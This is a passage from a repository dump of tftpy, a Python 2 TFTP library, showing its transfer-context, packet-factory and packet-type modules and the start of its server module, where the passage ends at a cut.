"content": "\"\"\"This module implements all contexts for state handling during uploads and\ndownloads, the main interface to which is the TftpContext base class.\n\nThe concept is simple. Each context object represents a single upload or\ndownload, and the state object in the context object represents the current\nstate of that transfer. The state object has a handle() method that expects\nthe next packet in the transfer, and returns a state object until the transfer\nis complete, at which point it returns None. That is, unless there is a fatal\nerror, in which case a TftpException is raised instead.\"\"\"\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpPacketFactory import TftpPacketFactory\nfrom TftpStates import *\nimport socket, time, sys\n\n###############################################################################\n# Utility classes\n###############################################################################\n\nclass TftpMetrics(object):\n    \"\"\"A class representing metrics of the transfer.\"\"\"\n    def __init__(self):\n        # Bytes transferred\n        self.bytes = 0\n        # Bytes re-sent\n        self.resent_bytes = 0\n        # Duplicate packets received\n        self.dups = {}\n        self.dupcount = 0\n        # Times\n        self.start_time = 0\n        self.end_time = 0\n        self.duration = 0\n        # Rates\n        self.bps = 0\n        self.kbps = 0\n        # Generic errors\n        self.errors = 0\n\n    def compute(self):\n        # Compute transfer time\n        self.duration = self.end_time - self.start_time\n        if self.duration == 0:\n            self.duration = 1\n        log.debug(\"TftpMetrics.compute: duration is %s\" % self.duration)\n        self.bps = (self.bytes * 8.0) / self.duration\n        self.kbps = self.bps / 1024.0\n        log.debug(\"TftpMetrics.compute: kbps is %s\" % self.kbps)\n        for key in self.dups:\n            self.dupcount += self.dups[key]\n\n
    def add_dup(self, pkt):\n        \"\"\"This method adds a dup for a packet to the metrics.\"\"\"\n        log.debug(\"Recording a dup of %s\" % pkt)\n        s = str(pkt)\n        if self.dups.has_key(s):\n            self.dups[s] += 1\n        else:\n            self.dups[s] = 1\n        tftpassert(self.dups[s] < MAX_DUPS, \"Max duplicates reached\")\n\n###############################################################################\n# Context classes\n###############################################################################\n\nclass TftpContext(object):\n    \"\"\"The base class of the contexts.\"\"\"\n\n    def __init__(self, host, port, timeout, dyn_file_func=None):\n        \"\"\"Constructor for the base context, setting shared instance\n        variables.\"\"\"\n        self.file_to_transfer = None\n        self.fileobj = None\n        self.options = None\n        self.packethook = None\n        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        self.sock.settimeout(timeout)\n        self.timeout = timeout\n        self.state = None\n        self.next_block = 0\n        self.factory = TftpPacketFactory()\n        # Note, setting the host will also set self.address, as it's a property.\n        self.host = host\n        self.port = port\n        # The port associated with the TID\n        self.tidport = None\n        # Metrics\n        self.metrics = TftpMetrics()\n        # Flag when the transfer is pending completion.\n        self.pending_complete = False\n        # Time when this context last received any traffic.\n        # FIXME: does this belong in metrics?\n        self.last_update = 0\n        # The last packet we sent, if applicable, to make resending easy.\n        self.last_pkt = None\n        self.dyn_file_func = dyn_file_func\n        # Count the number of retry attempts.\n        self.retry_count = 0\n\n    def getBlocksize(self):\n        \"\"\"Fetch the current blocksize for this session.\"\"\"\n
        return int(self.options.get('blksize', 512))\n\n    def __del__(self):\n        \"\"\"Simple destructor to try to call housekeeping in the end method if\n        not called explicitly. Leaking file descriptors is not a good\n        thing.\"\"\"\n        self.end()\n\n    def checkTimeout(self, now):\n        \"\"\"Compare current time with last_update time, and raise an exception\n        if we're over the timeout time.\"\"\"\n        log.debug(\"checking for timeout on session %s\" % self)\n        if now - self.last_update > self.timeout:\n            raise TftpTimeout, \"Timeout waiting for traffic\"\n\n    def start(self):\n        raise NotImplementedError, \"Abstract method\"\n\n    def end(self):\n        \"\"\"Perform session cleanup. Since the end method should always be\n        called explicitly by the calling code, this works better than the\n        destructor.\"\"\"\n        log.debug(\"in TftpContext.end\")\n        if self.fileobj is not None and not self.fileobj.closed:\n            log.debug(\"self.fileobj is open - closing\")\n            self.fileobj.close()\n\n    def gethost(self):\n        \"Simple getter method for use in a property.\"\n        return self.__host\n\n    def sethost(self, host):\n        \"\"\"Setter method that also sets the address property as a result\n        of the host that is set.\"\"\"\n        self.__host = host\n        self.address = socket.gethostbyname(host)\n\n    host = property(gethost, sethost)\n\n    def setNextBlock(self, block):\n        if block >= 2 ** 16:\n            log.debug(\"Block number rollover to 0 again\")\n            block = 0\n        self.__eblock = block\n\n    def getNextBlock(self):\n        return self.__eblock\n\n    next_block = property(getNextBlock, setNextBlock)\n\n    def cycle(self):\n        \"\"\"Here we wait for a response from the server after sending it\n        something, and dispatch appropriate action to that response.\"\"\"\n        try:\n            (buffer, (raddress, 
rport)) = self.sock.recvfrom(MAX_BLKSIZE)\n        except socket.timeout:\n            log.warn(\"Timeout waiting for traffic, retrying...\")\n            raise TftpTimeout, \"Timed-out waiting for traffic\"\n\n        # Ok, we've received a packet. Log it.\n        log.debug(\"Received %d bytes from %s:%s\"\n                        % (len(buffer), raddress, rport))\n        # And update our last updated time.\n        self.last_update = time.time()\n\n        # Decode it.\n        recvpkt = self.factory.parse(buffer)\n\n        # Check for known \"connection\".\n        if raddress != self.address:\n            log.warn(\"Received traffic from %s, expected host %s. Discarding\"\n                        % (raddress, self.host))\n\n        if self.tidport and self.tidport != rport:\n            log.warn(\"Received traffic from %s:%s but we're \"\n                        \"connected to %s:%s. Discarding.\"\n                        % (raddress, rport,\n                        self.host, self.tidport))\n\n        # If there is a packethook defined, call it. We unconditionally\n        # pass all packets, it's up to the client to screen out different\n        # kinds of packets. 
This way, the client is privy to things like\n        # negotiated options.\n        if self.packethook:\n            self.packethook(recvpkt)\n\n        # And handle it, possibly changing state.\n        self.state = self.state.handle(recvpkt, raddress, rport)\n        # If we didn't throw any exceptions here, reset the retry_count to\n        # zero.\n        self.retry_count = 0\n\nclass TftpContextServer(TftpContext):\n    \"\"\"The context for the server.\"\"\"\n    def __init__(self, host, port, timeout, root, dyn_file_func=None):\n        TftpContext.__init__(self,\n                             host,\n                             port,\n                             timeout,\n                             dyn_file_func\n                             )\n        # At this point we have no idea if this is a download or an upload. We\n        # need to let the start state determine that.\n        self.state = TftpStateServerStart(self)\n        self.root = root\n        self.dyn_file_func = dyn_file_func\n\n    def __str__(self):\n        return \"%s:%s %s\" % (self.host, self.port, self.state)\n\n    def start(self, buffer):\n        \"\"\"Start the state cycle. Note that the server context receives an\n        initial packet in its start method. Also note that the server does not\n        loop on cycle(), as it expects the TftpServer object to manage\n        that.\"\"\"\n        log.debug(\"In TftpContextServer.start\")\n        self.metrics.start_time = time.time()\n        log.debug(\"Set metrics.start_time to %s\" % self.metrics.start_time)\n        # And update our last updated time.\n        self.last_update = time.time()\n\n        pkt = self.factory.parse(buffer)\n        log.debug(\"TftpContextServer.start() - factory returned a %s\" % pkt)\n\n        # Call handle once with the initial packet. 
This should put us into\n        # the download or the upload state.\n        self.state = self.state.handle(pkt,\n                                       self.host,\n                                       self.port)\n\n    def end(self):\n        \"\"\"Finish up the context.\"\"\"\n        TftpContext.end(self)\n        self.metrics.end_time = time.time()\n        log.debug(\"Set metrics.end_time to %s\" % self.metrics.end_time)\n        self.metrics.compute()\n\nclass TftpContextClientUpload(TftpContext):\n    \"\"\"The upload context for the client during an upload.\n    Note: If input is a hyphen, then we will use stdin.\"\"\"\n    def __init__(self,\n                 host,\n                 port,\n                 filename,\n                 input,\n                 options,\n                 packethook,\n                 timeout):\n        TftpContext.__init__(self,\n                             host,\n                             port,\n                             timeout)\n        self.file_to_transfer = filename\n        self.options = options\n        self.packethook = packethook\n        if input == '-':\n            self.fileobj = sys.stdin\n        else:\n            self.fileobj = open(input, \"rb\")\n\n        log.debug(\"TftpContextClientUpload.__init__()\")\n        log.debug(\"file_to_transfer = %s, options = %s\" %\n            (self.file_to_transfer, self.options))\n\n    def __str__(self):\n        return \"%s:%s %s\" % (self.host, self.port, self.state)\n\n    def start(self):\n        log.info(\"Sending tftp upload request to %s\" % self.host)\n        log.info(\"    filename -> %s\" % self.file_to_transfer)\n        log.info(\"    options -> %s\" % self.options)\n\n        self.metrics.start_time = time.time()\n        log.debug(\"Set metrics.start_time to %s\" % self.metrics.start_time)\n\n        # FIXME: put this in a sendWRQ method?\n        pkt = TftpPacketWRQ()\n        pkt.filename = self.file_to_transfer\n        pkt.mode = \"octet\" 
# FIXME - shouldn't hardcode this\n        pkt.options = self.options\n        self.sock.sendto(pkt.encode().buffer, (self.host, self.port))\n        self.next_block = 1\n        self.last_pkt = pkt\n        # FIXME: should we centralize sendto operations so we can refactor all\n        # saving of the packet to the last_pkt field?\n\n        self.state = TftpStateSentWRQ(self)\n\n        while self.state:\n            try:\n                log.debug(\"State is %s\" % self.state)\n                self.cycle()\n            except TftpTimeout, err:\n                log.error(str(err))\n                self.retry_count += 1\n                if self.retry_count >= TIMEOUT_RETRIES:\n                    log.debug(\"hit max retries, giving up\")\n                    raise\n                else:\n                    log.warn(\"resending last packet\")\n                    self.state.resendLast()\n\n    def end(self):\n        \"\"\"Finish up the context.\"\"\"\n        TftpContext.end(self)\n        self.metrics.end_time = time.time()\n        log.debug(\"Set metrics.end_time to %s\" % self.metrics.end_time)\n        self.metrics.compute()\n\nclass TftpContextClientDownload(TftpContext):\n    \"\"\"The download context for the client during a download.\n    Note: If output is a hyphen, then the output will be sent to stdout.\"\"\"\n    def __init__(self,\n                 host,\n                 port,\n                 filename,\n                 output,\n                 options,\n                 packethook,\n                 timeout):\n        TftpContext.__init__(self,\n                             host,\n                             port,\n                             timeout)\n        # FIXME: should we refactor setting of these params?\n        self.file_to_transfer = filename\n        self.options = options\n        self.packethook = packethook\n        # FIXME - need to support alternate return formats than files?\n        # File-like objects would be ideal, ala 
duck-typing.\n        # If the filename is -, then use stdout\n        if output == '-':\n            self.fileobj = sys.stdout\n        elif type(output) == str:\n            self.fileobj = open(output, \"wb\")\n        else:\n            self.fileobj = output\n\n        log.debug(\"TftpContextClientDownload.__init__()\")\n        log.debug(\"file_to_transfer = %s, options = %s\" %\n            (self.file_to_transfer, self.options))\n\n    def __str__(self):\n        return \"%s:%s %s\" % (self.host, self.port, self.state)\n\n    def start(self):\n        \"\"\"Initiate the download.\"\"\"\n        log.info(\"Sending tftp download request to %s\" % self.host)\n        log.info(\"    filename -> %s\" % self.file_to_transfer)\n        log.info(\"    options -> %s\" % self.options)\n\n        self.metrics.start_time = time.time()\n        log.debug(\"Set metrics.start_time to %s\" % self.metrics.start_time)\n\n        # FIXME: put this in a sendRRQ method?\n        pkt = TftpPacketRRQ()\n        pkt.filename = self.file_to_transfer\n        pkt.mode = \"octet\" # FIXME - shouldn't hardcode this\n        pkt.options = self.options\n        self.sock.sendto(pkt.encode().buffer, (self.host, self.port))\n        self.next_block = 1\n        self.last_pkt = pkt\n\n        self.state = TftpStateSentRRQ(self)\n\n        while self.state:\n            try:\n                log.debug(\"State is %s\" % self.state)\n                self.cycle()\n            except TftpTimeout, err:\n                log.error(str(err))\n                self.retry_count += 1\n                if self.retry_count >= TIMEOUT_RETRIES:\n                    log.debug(\"hit max retries, giving up\")\n                    raise\n                else:\n                    log.warn(\"resending last packet\")\n                    self.state.resendLast()\n\n    def end(self):\n        \"\"\"Finish up the context.\"\"\"\n        TftpContext.end(self)\n        self.metrics.end_time = time.time()\n        
log.debug(\"Set metrics.end_time to %s\" % self.metrics.end_time)\n        self.metrics.compute()\n"
  },
  {
    "path": "tftpy/TftpPacketFactory.py",
"content": "\"\"\"This module implements the TftpPacketFactory class, which can take a binary\nbuffer, and return the appropriate TftpPacket object to represent it, via the\nparse() method.\"\"\"\n\nimport struct\n\nfrom TftpShared import *\nfrom TftpPacketTypes import *\n\nclass TftpPacketFactory(object):\n    \"\"\"This class generates TftpPacket objects. It is responsible for parsing\n    raw buffers off of the wire and returning objects representing them, via\n    the parse() method.\"\"\"\n    def __init__(self):\n        self.classes = {\n            1: TftpPacketRRQ,\n            2: TftpPacketWRQ,\n            3: TftpPacketDAT,\n            4: TftpPacketACK,\n            5: TftpPacketERR,\n            6: TftpPacketOACK\n            }\n\n    def parse(self, buffer):\n        \"\"\"This method is used to parse an existing datagram into its\n        corresponding TftpPacket object. The buffer is the raw bytes off of\n        the network.\"\"\"\n        log.debug(\"parsing a %d byte packet\" % len(buffer))\n        (opcode,) = struct.unpack(\"!H\", buffer[:2])\n        log.debug(\"opcode is %d\" % opcode)\n        packet = self.__create(opcode)\n        packet.buffer = buffer\n        return packet.decode()\n\n    def __create(self, opcode):\n        \"\"\"This method returns the appropriate class object corresponding to\n        the passed opcode.\"\"\"\n        tftpassert(self.classes.has_key(opcode),\n                   \"Unsupported opcode: %d\" % opcode)\n\n        packet = self.classes[opcode]()\n\n        return packet\n"
  },
  {
    "path": "tftpy/TftpPacketTypes.py",
    "content": "\"\"\"This module implements the packet types of TFTP itself, and the\ncorresponding encode and decode methods for them.\"\"\"\n\nimport struct\nfrom TftpShared import *\n\nclass TftpSession(object):\n    \"\"\"This class is the base class for the tftp client and server. Any shared\n    code should be in this class.\"\"\"\n    # FIXME: do we need this anymore?\n    pass\n\nclass TftpPacketWithOptions(object):\n    \"\"\"This class exists to permit some TftpPacket subclasses to share code\n    regarding options handling. It does not inherit from TftpPacket, as the\n    goal is just to share code here, and not cause diamond inheritance.\"\"\"\n\n    def __init__(self):\n        self.options = {}\n\n    def setoptions(self, options):\n        log.debug(\"in TftpPacketWithOptions.setoptions\")\n        log.debug(\"options: \" + str(options))\n        myoptions = {}\n        for key in options:\n            newkey = str(key)\n            myoptions[newkey] = str(options[key])\n            log.debug(\"populated myoptions with %s = %s\"\n                         % (newkey, myoptions[newkey]))\n\n        log.debug(\"setting options hash to: \" + str(myoptions))\n        self._options = myoptions\n\n    def getoptions(self):\n        log.debug(\"in TftpPacketWithOptions.getoptions\")\n        return self._options\n\n    # Set up getter and setter on options to ensure that they are the proper\n    # type. They should always be strings, but we don't need to force the\n    # client to necessarily enter strings if we can avoid it.\n    options = property(getoptions, setoptions)\n\n    def decode_options(self, buffer):\n        \"\"\"This method decodes the section of the buffer that contains an\n        unknown number of options. 
It returns a dictionary of option names and\n        values.\"\"\"\n        format = \"!\"\n        options = {}\n\n        log.debug(\"decode_options: buffer is: \" + repr(buffer))\n        log.debug(\"size of buffer is %d bytes\" % len(buffer))\n        if len(buffer) == 0:\n            log.debug(\"size of buffer is zero, returning empty hash\")\n            return {}\n\n        # Count the nulls in the buffer. Each one terminates a string.\n        log.debug(\"about to iterate options buffer counting nulls\")\n        length = 0\n        for c in buffer:\n            #log.debug(\"iterating this byte: \" + repr(c))\n            if ord(c) == 0:\n                log.debug(\"found a null at length %d\" % length)\n                if length > 0:\n                    format += \"%dsx\" % length\n                    length = -1\n                else:\n                    raise TftpException, \"Invalid options in buffer\"\n            length += 1\n\n        log.debug(\"about to unpack, format is: %s\" % format)\n        mystruct = struct.unpack(format, buffer)\n\n        tftpassert(len(mystruct) % 2 == 0,\n                   \"packet with odd number of option/value pairs\")\n\n        for i in range(0, len(mystruct), 2):\n            log.debug(\"setting option %s to %s\" % (mystruct[i], mystruct[i+1]))\n            options[mystruct[i]] = mystruct[i+1]\n\n        return options\n\nclass TftpPacket(object):\n    \"\"\"This class is the parent class of all tftp packet classes. 
It is an\n    abstract class, providing an interface, and should not be instantiated\n    directly.\"\"\"\n    def __init__(self):\n        self.opcode = 0\n        self.buffer = None\n\n    def encode(self):\n        \"\"\"The encode method of a TftpPacket takes keyword arguments specific\n        to the type of packet, and packs an appropriate buffer in network-byte\n        order suitable for sending over the wire.\n\n        This is an abstract method.\"\"\"\n        raise NotImplementedError, \"Abstract method\"\n\n    def decode(self):\n        \"\"\"The decode method of a TftpPacket takes a buffer off of the wire in\n        network-byte order, and decodes it, populating internal properties as\n        appropriate. This can only be done once the first 2-byte opcode has\n        already been decoded, but the data section does include the entire\n        datagram.\n\n        This is an abstract method.\"\"\"\n        raise NotImplementedError, \"Abstract method\"\n\nclass TftpPacketInitial(TftpPacket, TftpPacketWithOptions):\n    \"\"\"This class is a common parent class for the RRQ and WRQ packets, as\n    they share quite a bit of code.\"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        TftpPacketWithOptions.__init__(self)\n        self.filename = None\n        self.mode = None\n\n    def encode(self):\n        \"\"\"Encode the packet's buffer from the instance variables.\"\"\"\n        tftpassert(self.filename, \"filename required in initial packet\")\n        tftpassert(self.mode, \"mode required in initial packet\")\n\n        ptype = None\n        if self.opcode == 1: ptype = \"RRQ\"\n        else:                ptype = \"WRQ\"\n        log.debug(\"Encoding %s packet, filename = %s, mode = %s\"\n                     % (ptype, self.filename, self.mode))\n        for key in self.options:\n            log.debug(\"    Option %s = %s\" % (key, self.options[key]))\n\n        format = \"!H\"\n        format += \"%dsx\" % 
len(self.filename)\n        if self.mode == \"octet\":\n            format += \"5sx\"\n        else:\n            raise AssertionError, \"Unsupported mode: %s\" % self.mode\n        # Add options.\n        options_list = []\n        if len(self.options) > 0:\n            log.debug(\"there are options to encode\")\n            for key in self.options:\n                # Populate the option name\n                format += \"%dsx\" % len(key)\n                options_list.append(key)\n                # Populate the option value\n                format += \"%dsx\" % len(str(self.options[key]))\n                options_list.append(str(self.options[key]))\n\n        log.debug(\"format is %s\" % format)\n        log.debug(\"options_list is %s\" % options_list)\n        log.debug(\"size of struct is %d\" % struct.calcsize(format))\n\n        self.buffer = struct.pack(format,\n                                  self.opcode,\n                                  self.filename,\n                                  self.mode,\n                                  *options_list)\n\n        log.debug(\"buffer is \" + repr(self.buffer))\n        return self\n\n    def decode(self):\n        tftpassert(self.buffer, \"Can't decode, buffer is empty\")\n\n        # FIXME - this shares a lot of code with decode_options\n        nulls = 0\n        format = \"\"\n        nulls = length = tlength = 0\n        log.debug(\"in decode: about to iterate buffer counting nulls\")\n        subbuf = self.buffer[2:]\n        for c in subbuf:\n            log.debug(\"iterating this byte: \" + repr(c))\n            if ord(c) == 0:\n                nulls += 1\n                log.debug(\"found a null at length %d, now have %d\"\n                             % (length, nulls))\n                format += \"%dsx\" % length\n                length = -1\n                # At 2 nulls, we want to mark that position for decoding.\n                if nulls == 2:\n                    break\n            length += 1\n
            tlength += 1\n\n        log.debug(\"hopefully found end of mode at length %d\" % tlength)\n        # length should now be the end of the mode.\n        tftpassert(nulls == 2, \"malformed packet\")\n        shortbuf = subbuf[:tlength+1]\n        log.debug(\"about to unpack buffer with format: %s\" % format)\n        log.debug(\"unpacking buffer: \" + repr(shortbuf))\n        mystruct = struct.unpack(format, shortbuf)\n\n        tftpassert(len(mystruct) == 2, \"malformed packet\")\n        self.filename = mystruct[0]\n        self.mode = mystruct[1].lower() # force lc - bug 17\n        log.debug(\"set filename to %s\" % self.filename)\n        log.debug(\"set mode to %s\" % self.mode)\n\n        self.options = self.decode_options(subbuf[tlength+1:])\n        return self\n\nclass TftpPacketRRQ(TftpPacketInitial):\n    \"\"\"\n::\n\n            2 bytes    string   1 byte     string   1 byte\n            -----------------------------------------------\n    RRQ/  | 01/02 |  Filename  |   0  |    Mode    |   0  |\n    WRQ     -----------------------------------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacketInitial.__init__(self)\n        self.opcode = 1\n\n    def __str__(self):\n        s = 'RRQ packet: filename = %s' % self.filename\n        s += ' mode = %s' % self.mode\n        if self.options:\n            s += '\\n    options = %s' % self.options\n        return s\n\nclass TftpPacketWRQ(TftpPacketInitial):\n    \"\"\"\n::\n\n            2 bytes    string   1 byte     string   1 byte\n            -----------------------------------------------\n    RRQ/  | 01/02 |  Filename  |   0  |    Mode    |   0  |\n    WRQ     -----------------------------------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacketInitial.__init__(self)\n        self.opcode = 2\n\n    def __str__(self):\n        s = 'WRQ packet: filename = %s' % self.filename\n        s += ' mode = %s' % self.mode\n        if self.options:\n            s += '\\n    
options = %s' % self.options\n        return s\n\nclass TftpPacketDAT(TftpPacket):\n    \"\"\"\n::\n\n            2 bytes    2 bytes       n bytes\n            ---------------------------------\n    DATA  | 03    |   Block #  |    Data    |\n            ---------------------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        self.opcode = 3\n        self.blocknumber = 0\n        self.data = None\n\n    def __str__(self):\n        s = 'DAT packet: block %s' % self.blocknumber\n        if self.data:\n            s += '\\n    data: %d bytes' % len(self.data)\n        return s\n\n    def encode(self):\n        \"\"\"Encode the DAT packet. This method populates self.buffer, and\n        returns self for easy method chaining.\"\"\"\n        if len(self.data) == 0:\n            log.debug(\"Encoding an empty DAT packet\")\n        format = \"!HH%ds\" % len(self.data)\n        self.buffer = struct.pack(format,\n                                  self.opcode,\n                                  self.blocknumber,\n                                  self.data)\n        return self\n\n    def decode(self):\n        \"\"\"Decode self.buffer into instance variables. It returns self for\n        easy method chaining.\"\"\"\n        # We know the first 2 bytes are the opcode. 
The second two are the\n        # block number.\n        (self.blocknumber,) = struct.unpack(\"!H\", self.buffer[2:4])\n        log.debug(\"decoding DAT packet, block number %d\" % self.blocknumber)\n        log.debug(\"should be %d bytes in the packet total\"\n                     % len(self.buffer))\n        # Everything else is data.\n        self.data = self.buffer[4:]\n        log.debug(\"found %d bytes of data\"\n                     % len(self.data))\n        return self\n\nclass TftpPacketACK(TftpPacket):\n    \"\"\"\n::\n\n            2 bytes    2 bytes\n            -------------------\n    ACK   | 04    |   Block #  |\n            --------------------\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        self.opcode = 4\n        self.blocknumber = 0\n\n    def __str__(self):\n        return 'ACK packet: block %d' % self.blocknumber\n\n    def encode(self):\n        log.debug(\"encoding ACK: opcode = %d, block = %d\"\n                     % (self.opcode, self.blocknumber))\n        self.buffer = struct.pack(\"!HH\", self.opcode, self.blocknumber)\n        return self\n\n    def decode(self):\n        self.opcode, self.blocknumber = struct.unpack(\"!HH\", self.buffer)\n        log.debug(\"decoded ACK packet: opcode = %d, block = %d\"\n                     % (self.opcode, self.blocknumber))\n        return self\n\nclass TftpPacketERR(TftpPacket):\n    \"\"\"\n::\n\n            2 bytes  2 bytes        string    1 byte\n            ----------------------------------------\n    ERROR | 05    |  ErrorCode |   ErrMsg   |   0  |\n            ----------------------------------------\n\n    Error Codes\n\n    Value     Meaning\n\n    0         Not defined, see error message (if any).\n    1         File not found.\n    2         Access violation.\n    3         Disk full or allocation exceeded.\n    4         Illegal TFTP operation.\n    5         Unknown transfer ID.\n    6         File already exists.\n    7         No such user.\n    8  
       Failed to negotiate options\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        self.opcode = 5\n        self.errorcode = 0\n        # FIXME: We don't encode the errmsg...\n        self.errmsg = None\n        # FIXME - integrate in TftpErrors references?\n        self.errmsgs = {\n            1: \"File not found\",\n            2: \"Access violation\",\n            3: \"Disk full or allocation exceeded\",\n            4: \"Illegal TFTP operation\",\n            5: \"Unknown transfer ID\",\n            6: \"File already exists\",\n            7: \"No such user\",\n            8: \"Failed to negotiate options\"\n            }\n\n    def __str__(self):\n        s = 'ERR packet: errorcode = %d' % self.errorcode\n        s += '\\n    msg = %s' % self.errmsgs.get(self.errorcode, '')\n        return s\n\n    def encode(self):\n        \"\"\"Encode the ERR packet based on instance variables, populating\n        self.buffer, returning self.\"\"\"\n        # Fall back to an empty message for error codes not in errmsgs\n        # (e.g. 0, \"not defined\") rather than raising a KeyError here.\n        errmsg = self.errmsgs.get(self.errorcode, \"\")\n        format = \"!HH%dsx\" % len(errmsg)\n        log.debug(\"encoding ERR packet with format %s\" % format)\n        self.buffer = struct.pack(format,\n                                  self.opcode,\n                                  self.errorcode,\n                                  errmsg)\n        return self\n\n    def decode(self):\n        \"Decode self.buffer, populating instance variables and return self.\"\n        buflen = len(self.buffer)\n        tftpassert(buflen >= 4, \"malformed ERR packet, too short\")\n        log.debug(\"Decoding ERR packet, length %s bytes\" % buflen)\n        if buflen == 4:\n            log.debug(\"Allowing this affront to the RFC of a 4-byte packet\")\n            format = \"!HH\"\n            log.debug(\"Decoding ERR packet with format: %s\" % format)\n            self.opcode, self.errorcode = struct.unpack(format,\n                                                        self.buffer)\n        else:\n            log.debug(\"Good ERR packet > 4 bytes\")\n            format = \"!HH%dsx\" % (len(self.buffer) - 5)\n            log.debug(\"Decoding ERR packet with format: %s\" % format)\n            self.opcode, self.errorcode, self.errmsg = struct.unpack(format,\n                                                                     self.buffer)\n        log.error(\"ERR packet - errorcode: %d, message: %s\"\n                     % (self.errorcode, self.errmsg))\n        return self\n\nclass TftpPacketOACK(TftpPacket, TftpPacketWithOptions):\n    \"\"\"\n::\n\n    +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+\n    |  opc  |  opt1  | 0 | value1 | 0 |  optN  | 0 | valueN | 0 |\n    +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+\n    \"\"\"\n    def __init__(self):\n        TftpPacket.__init__(self)\n        TftpPacketWithOptions.__init__(self)\n        self.opcode = 6\n\n    def __str__(self):\n        return 'OACK packet:\\n    options = %s' % self.options\n\n    def encode(self):\n        format = \"!H\" # opcode\n        options_list = []\n        log.debug(\"in TftpPacketOACK.encode\")\n        for key in self.options:\n            log.debug(\"looping on option key %s\" % key)\n            log.debug(\"value is %s\" % self.options[key])\n            format += \"%dsx\" % len(key)\n            format += \"%dsx\" % len(self.options[key])\n            options_list.append(key)\n            options_list.append(self.options[key])\n        self.buffer = struct.pack(format, self.opcode, *options_list)\n        return self\n\n    def decode(self):\n        self.options = self.decode_options(self.buffer[2:])\n        return self\n\n    def match_options(self, options):\n        \"\"\"This method takes a set of options, and tries to match them with\n        its own. It can accept some changes in those options from the server as\n        part of a negotiation. Changed or unchanged, it will return a dict of\n        the options so that the session can update itself to the negotiated\n        options.\"\"\"\n        for name in self.options:\n            if options.has_key(name):\n                if name == 'blksize':\n                    # We can accept anything between the min and max values.\n                    # Option values arrive off the wire as strings, so\n                    # compare as an integer.\n                    size = int(self.options[name])\n                    if size >= MIN_BLKSIZE and size <= MAX_BLKSIZE:\n                        log.debug(\"negotiated blksize of %d bytes\" % size)\n                        options['blksize'] = size\n                else:\n                    raise TftpException, \"Unsupported option: %s\" % name\n        return True\n"
  },
  {
    "path": "tftpy/TftpServer.py",
    "content": "\"\"\"This module implements the TFTP Server functionality. Instantiate an\ninstance of the server, and then run the listen() method to listen for client\nrequests. Logging is performed via a standard logging object set in\nTftpShared.\"\"\"\n\nimport socket, os, time\nimport select\nfrom TftpShared import *\nfrom TftpPacketTypes import *\nfrom TftpPacketFactory import TftpPacketFactory\nfrom TftpContexts import TftpContextServer\n\nclass TftpServer(TftpSession):\n    \"\"\"This class implements a tftp server object. Run the listen() method to\n    listen for client requests.  It takes two optional arguments. tftproot is\n    the path to the tftproot directory to serve files from and/or write them\n    to. dyn_file_func is a callable that must return a file-like object to\n    read from during downloads. This permits the serving of dynamic\n    content.\"\"\"\n\n    def __init__(self, tftproot='/tftpboot', dyn_file_func=None):\n        self.listenip = None\n        self.listenport = None\n        self.sock = None\n        # FIXME: What about multiple roots?\n        self.root = os.path.abspath(tftproot)\n        self.dyn_file_func = dyn_file_func\n        # A dict of sessions, where each session is keyed by a string like\n        # ip:tid for the remote end.\n        self.sessions = {}\n\n        if os.path.exists(self.root):\n            log.debug(\"tftproot %s does exist\" % self.root)\n            if not os.path.isdir(self.root):\n                raise TftpException, \"The tftproot must be a directory.\"\n            else:\n                log.debug(\"tftproot %s is a directory\" % self.root)\n                if os.access(self.root, os.R_OK):\n                    log.debug(\"tftproot %s is readable\" % self.root)\n                else:\n                    raise TftpException, \"The tftproot must be readable\"\n                if os.access(self.root, os.W_OK):\n                    log.debug(\"tftproot %s is writable\" % self.root)\n               
 else:\n                    log.warning(\"The tftproot %s is not writable\" % self.root)\n        else:\n            raise TftpException, \"The tftproot does not exist.\"\n\n    def listen(self,\n               listenip=\"\",\n               listenport=DEF_TFTP_PORT,\n               timeout=SOCK_TIMEOUT):\n        \"\"\"Start a server listening on the supplied interface and port. This\n        defaults to INADDR_ANY (all interfaces) and UDP port 69. You can also\n        supply a different socket timeout value, if desired.\"\"\"\n        tftp_factory = TftpPacketFactory()\n\n        # Don't use new 2.5 ternary operator yet\n        # listenip = listenip if listenip else '0.0.0.0'\n        if not listenip: listenip = '0.0.0.0'\n        log.info(\"Server requested on ip %s, port %s\"\n                % (listenip, listenport))\n        try:\n            # FIXME - sockets should be non-blocking\n            self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n            self.sock.bind((listenip, listenport))\n        except socket.error, err:\n            # Reraise it for now.\n            raise\n\n        log.info(\"Starting receive loop...\")\n        while True:\n            # Build the inputlist array of sockets to select() on.\n            inputlist = []\n            inputlist.append(self.sock)\n            for key in self.sessions:\n                inputlist.append(self.sessions[key].sock)\n\n            # Block until some socket has input on it.\n            log.debug(\"Performing select on this inputlist: %s\" % inputlist)\n            readyinput, readyoutput, readyspecial = select.select(inputlist,\n                                                                  [],\n                                                                  [],\n                                                                  SOCK_TIMEOUT)\n\n            deletion_list = []\n\n            # Handle the available data, if any. 
Maybe we timed-out.\n            for readysock in readyinput:\n                # Is the traffic on the main server socket? ie. new session?\n                if readysock == self.sock:\n                    log.debug(\"Data ready on our main socket\")\n                    buffer, (raddress, rport) = self.sock.recvfrom(MAX_BLKSIZE)\n\n                    log.debug(\"Read %d bytes\" % len(buffer))\n\n                    # Forge a session key based on the client's IP and port,\n                    # which should safely work through NAT.\n                    key = \"%s:%s\" % (raddress, rport)\n\n                    if not self.sessions.has_key(key):\n                        log.debug(\"Creating new server context for \"\n                                     \"session key = %s\" % key)\n                        self.sessions[key] = TftpContextServer(raddress,\n                                                               rport,\n                                                               timeout,\n                                                               self.root,\n                                                               self.dyn_file_func)\n                        try:\n                            self.sessions[key].start(buffer)\n                        except TftpException, err:\n                            deletion_list.append(key)\n                            log.error(\"Fatal exception thrown from \"\n                                      \"session %s: %s\" % (key, str(err)))\n                    else:\n                        log.warn(\"received traffic on main socket for \"\n                                 \"existing session??\")\n                    log.info(\"Currently handling these 